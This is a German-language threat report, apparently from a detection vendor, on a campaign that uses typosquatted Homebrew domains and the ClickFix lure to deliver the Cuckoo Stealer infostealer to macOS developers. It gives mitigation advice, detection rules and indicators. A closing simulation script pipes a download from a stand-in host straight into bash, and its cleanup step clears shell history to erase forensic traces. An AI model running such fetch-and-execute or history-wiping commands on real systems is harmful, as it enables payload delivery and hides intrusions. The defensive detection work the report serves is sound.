Gefälschte Homebrew-Typosquats zur Verbreitung von Cuckoo Stealer über ClickFix genutzt
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt eine Kampagne, die typosquattierte Homebrew-Domains missbraucht, um macOS-Entwickler zu verleiten, bösartige „installieren“-Befehle über die ClickFix-Technik auszuführen. Ein gestalteter curl-Einzeiler leitet die Opfer zu einer vom Angreifer kontrollierten Infrastruktur, die einen Anmeldeinformations-stehlenden Loader und anschließend den Cuckoo Stealer-Infostealer liefert. Die Malware bleibt durch einen LaunchAgent bestehen, entfernt Quarantäne-Attribute und exportiert Anmeldeinformationen und Wallet-Daten über HTTPS. Die Erkennung sollte sich auf curl-Befehlsmuster und die zugehörige Infrastruktur konzentrieren.
Untersuchung
Forscher verfolgten den ersten Köder auf homabrews.org zurück, der auf 5.255.123.244 in den Niederlanden aufgelöst wurde und mehrere ähnliche Domains hostet (einschließlich raw.homabrews.org, das zur Bereitstellung verwendet wird). Das heruntergeladene Skript führt eine dscl authonly-Schleife aus, um macOS-Anmeldeinformationen zu validieren, und ruft dann eine Binärdatei namens brew_agent ab. In der zweiten Stufe erstellt Cuckoo Stealer eine LaunchAgent-Plist, entfernt Quarantäne-Flags und kommuniziert mit dem C2 unter Verwendung des X25519-Schlüsselaustauschs mit XOR-verschlüsselten Nutzlasten. Die Infrastrukturjagd deckte ein Netzwerk von mindestens sechs Domains auf, die dieselbe Hosting-IP teilen.
Minderung
Schulen Sie Entwickler darin, Homebrew-Installations-URLs zu überprüfen und das Kopieren und Einfügen von nicht vertrauenswürdigen Befehlen in das Terminal zu vermeiden. Aktivieren Sie die Protokollierung der Befehlszeile und beschränken Sie Muster, bei denen curl Skripte aus dem Internet zum sofortigen Ausführen herunterlädt, insbesondere Einzeiler im Stil von „curl | sh“. Der Endpunktschutz sollte bei verdächtigen LaunchAgent-Erstellungen und -Entfernungen von Quarantäne-Attributen alarmieren. Netzverteidigungen sollten bekannte bösartige Domains blockieren und den Verkehr zu raw.homabrews.org und verwandten Hosts flaggen.
Reaktion
Wenn ein verdächtiger curl-Befehl erkannt wird, isolieren Sie den Endpunkt, erfassen Sie das Skript und die brew_agent-Binärdatei und sammeln Sie die LaunchAgent-Plist zur Analyse. Setzen Sie kompromittierte Anmeldeinformationen zurück und widerrufen Sie kompromittierte Token, insbesondere für Browser, Schlüsselbund und Kryptowährungs-Wallets. Überprüfen Sie forensisch das versteckte BrewUpdater-Verzeichnis, alle erstellten Verknüpfungen und entfernen Sie die bösartigen Dateien. Aktualisieren Sie Erkennungen mit den extrahierten IOCs und überwachen Sie die Wiederverwendung derselben Infrastruktur.
Angriffsablauf
Erkennungen
Verdächtige Keychain-Aktivität (via process_creation)
Ansehen
MacOS Verdächtige Tmp-Ordner-Dateiberechtigungsänderung (via cmdline)
Ansehen
Verdächtige MacOS – Plist-Standorte und -Namen (via file_event)
Ansehen
Verdächtiger Zugriff auf gespeicherte Browser-Anmeldedaten MacOS (via process_creation)
Ansehen
MacOS-Systemlautstärke wurde mit Osascript stummgeschaltet (via cmdline)
Ansehen
Mögliche Sammlung durch MacOS-Bildschirmaufnahme Ausführungsversuch (via cmdline)
Ansehen
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Ansehen
IOCs (HashSha256) zum Erkennen: Gefälschte Homebrew-Typosquat-Domains, die zur Bereitstellung von Cuckoo Stealer über ClickFix verwendet werden
Ansehen
IOCs (SourceIP) zum Erkennen: Gefälschte Homebrew-Typosquat-Domains, die zur Bereitstellung von Cuckoo Stealer über ClickFix verwendet werden
Ansehen
IOCs (DestinationIP) zum Erkennen: Gefälschte Homebrew-Typosquat-Domains, die zur Bereitstellung von Cuckoo Stealer über ClickFix verwendet werden
Ansehen
Erkennung von bösartigen macOS-Installationsbefehlen über ClickFix [Linux-Prozesserstellung]
Ansehen
Erkennung einer Typosquatting-Domain und bösartiger IP in der ClickFix-Kampagne [Netzwerkindikatoren]
Ansehen
Simulation Ablauf
Voraussetzung: Die Telemetrie- & Basislinientest-Vorabprüfung muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genau erwartete Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
Ein Angreifer hat ein bösartiges PowerShell-kodiertes Skript erlangt, das auf einem C2-Server gehostet wird. Um das Schreiben von Dateien auf die Festplatte zu vermeiden, streamt der Angreifer das Skript direkt in eine Bash-Shellcurl -fsSLund die-cFlagge. Der Befehl wird interaktiv von einem kompromittierten Benutzerkonto aus ausgeführt und imitiert einen legitimen „Klick-fix“ Installer. Die Schritte sind:- Lösen Sie die bösartige Nutzlast-URL auf (z.B.
https://evil.example.com/payload.sh). - Leiten Sie den Download in Bash um und geben Sie Bash die Anweisung, den Inhalt mit
-c. - zu auszuführen Die Nutzlast führt die Ernte von Anmeldeinformationen durch, erstellt eine versteckte Datei und löscht dann das temporäre Skript (abdeckend).
- Lösen Sie die bösartige Nutzlast-URL auf (z.B.
-
Regressionstest-Skript:
#!/usr/bin/env bash # ------------------------------------------------- # Bösartigen macOS-Installer simulieren (ClickFix-Stil) # ------------------------------------------------- set -euo pipefail MALICIOUS_URL="https://evil.example.com/payload.sh" # Streamen der Nutzlast direkt in Bash mit -c curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)" # Die Nutzlast selbst sollte ihre bösartigen Aktionen ausführen. # Für den Testzweck geben wir einfach einen Marker aus. echo "Bösartige Nutzlast ausgeführt" -
Bereinigungsbefehle:
# Entfernen Sie alle Dateien, die möglicherweise von der Nutzlast erstellt wurden rm -f /tmp/payload.sh # Optional, die Befehlsgeschichte löschen, um forensische Spuren zu reduzieren history -c